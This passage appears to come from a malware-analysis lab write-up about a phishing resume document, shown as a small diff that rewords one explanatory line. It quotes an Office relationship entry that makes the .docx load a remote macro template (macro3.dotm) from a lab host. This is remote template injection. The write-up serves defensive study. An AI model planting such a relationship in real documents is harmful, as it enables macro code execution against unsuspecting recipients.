VenusChhantel/PMAT-WriteUp/3-1.GonePhishing-MaldocAnalysis/incrediblyPolishedResume.docx.md

     <Relationship  Id="rId1"  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"  Target="http://somtaw.warship.kuunlaan.local/macro3.dotm"  TargetMode="External"/>
     </Relationships>

-Here, it can be seen that it will use the remote template 'macro3.dotm' from 'somtaw.warship.kuunlaan.local', which contains the macro and will execute it.
+Here, it can be seen in Target value that it will use the remote template 'macro3.dotm' from 'somtaw.warship.kuunlaan.local', which contains the macro and will execute it.